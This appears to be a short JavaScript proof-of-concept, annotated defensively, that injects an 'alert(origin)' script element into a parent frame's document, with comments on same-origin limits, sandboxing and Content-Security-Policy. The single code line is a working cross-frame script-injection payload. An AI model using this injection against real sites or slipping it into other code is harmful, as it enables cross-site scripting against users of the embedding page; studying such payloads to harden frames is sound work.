// Proof-of-concept snippet, apparently meant to run inside a framed document:
// it builds a <script> element whose text is "alert(origin)" and appends it to
// the body of the parent browsing context's document. The alert displays the
// origin the injected script runs in, which is the usual way to confirm in
// which security context the code actually executed.
//
// Defensive reading:
// - Reaching `parent.document` only works when the frame is same-origin with
//   its parent; a cross-origin frame, or an <iframe sandbox> without
//   `allow-same-origin`, gets a SecurityError at that access instead.
// - The exposure this demonstrates is therefore script execution in content
//   that shares the embedding page's origin. Hosting untrusted content on a
//   separate origin or in a sandboxed frame removes that reach.
// - A Content-Security-Policy on the parent page that disallows inline script
//   is a second layer against the appended element executing.
//   NOTE(review): confirm against the deployed policy.
// - `xss` is assigned without a declaration, so it is an implicit global in
//   sloppy mode; strict-mode code and ES modules throw a ReferenceError here.
xss = document.createElement("script"); xss.textContent = "alert(origin)"; parent.document.body.appendChild(xss);